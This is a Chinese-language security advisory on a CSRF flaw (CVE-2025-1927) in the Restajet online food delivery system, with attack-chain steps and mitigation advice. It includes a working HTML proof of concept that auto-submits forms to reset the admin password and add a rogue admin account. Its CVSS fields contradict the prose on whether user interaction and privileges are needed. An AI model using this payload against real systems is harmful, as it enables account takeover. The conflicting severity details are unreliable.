CVE-2025-1927 Restajet在线食品配送系统跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-1927

漏洞类型

CSRF

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Restajet Online Food Delivery System

漏洞概述

CVE-2025-1927是Restajet Information Technologies Inc.开发的在线食品配送系统中存在的一个跨站请求伪造（Cross-Site Request Forgery，CSRF）安全漏洞。该漏洞允许攻击者通过诱导已登录用户访问恶意页面，在用户不知情的情况下以该用户的身份执行非预期的操作。由于该系统缺乏对关键操作的CSRF令牌验证，攻击者可以利用此漏洞进行各种恶意操作，包括但不限于修改用户账户信息、添加或删除食品订单、变更配送地址、修改菜单内容等。CVSS 3.1评分7.1分，属于高危漏洞，攻击复杂度低，无需特殊权限即可发起攻击，但需要用户交互。该漏洞影响截至19122025版本的所有在线食品配送系统版本。值得注意的是，漏洞发现者在早期就联系了厂商，但未收到任何回应。

技术细节

该CSRF漏洞存在于Restajet在线食品配送系统的多个功能模块中，主要原因是系统未对敏感操作实施CSRF令牌验证机制。攻击者可以构造一个恶意HTML页面，包含自动提交的表单，该表单模仿系统的合法请求。当已登录用户访问该恶意页面时，浏览器会自动携带用户的会话Cookie向目标系统发送请求。由于系统仅验证用户是否已登录，而未验证请求的来源是否合法，因此攻击者的恶意请求将被成功执行。常见的攻击场景包括：修改管理员账户密码、添加新管理员账户、删除用户订单、修改菜品信息等。攻击者通常会使用社会工程学手段诱导用户点击恶意链接，或将恶意代码嵌入到第三方网站的广告或评论中。防御此类漏洞需要在所有状态变更请求中实施CSRF令牌（Token）验证机制。

攻击链分析

STEP 1

步骤1

攻击者创建恶意HTML页面，包含针对目标系统的CSRF攻击代码

STEP 2

步骤2

攻击者通过社会工程学手段（如钓鱼邮件、恶意链接）诱导已登录用户访问恶意页面

STEP 3

步骤3

用户浏览器加载恶意页面后，自动向目标系统发送携带用户会话Cookie的恶意请求

STEP 4

步骤4

目标系统验证用户会话有效后，执行攻击者构造的非法操作（如修改密码、添加管理员等）

STEP 5

步骤5

攻击者成功获取系统控制权或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!DOCTYPE html> <html> <head> <title>CSRF Attack PoC</title> </head> <body> <h1>CSRF PoC for CVE-2025-1927</h1> <p>This PoC demonstrates the CSRF vulnerability in Restajet Online Food Delivery System.</p>  <form action="https://target-site.com/admin/profile/update" method="POST" id="csrfForm"> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="password" value="hacked123" /> <input type="hidden" name="email" value="[email protected]" /> </form>  <form action="https://target-site.com/admin/users/add" method="POST" id="csrfForm2"> <input type="hidden" name="new_username" value="hacker" /> <input type="hidden" name="new_password" value="hacker123" /> <input type="hidden" name="role" value="admin" /> </form> <script> // Auto-submit forms when page loads document.getElementById('csrfForm').submit(); // Or trigger second form after first submission // setTimeout(() => document.getElementById('csrfForm2').submit(), 1000); </script> <p>If you see this message, the forms were submitted successfully.</p> </body> </html>

影响范围

Restajet Online Food Delivery System <= 19122025

防御指南

临时缓解措施

由于厂商未回应，无法获得官方补丁。建议临时采取以下措施：1）禁用不必要的用户操作功能；2）增加IP白名单限制；3）监控异常的管理员操作行为；4）使用Web应用防火墙（WAF）添加CSRF特征规则；5）考虑暂时关闭系统或切换到安全的替代方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-1927
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-1927
3 Details https://www.cvedetails.com/cve/CVE-2025-1927/
4 VulDB https://vuldb.com/cve/CVE-2025-1927
5 Link https://www.usom.gov.tr/bildirim/tr-25-0469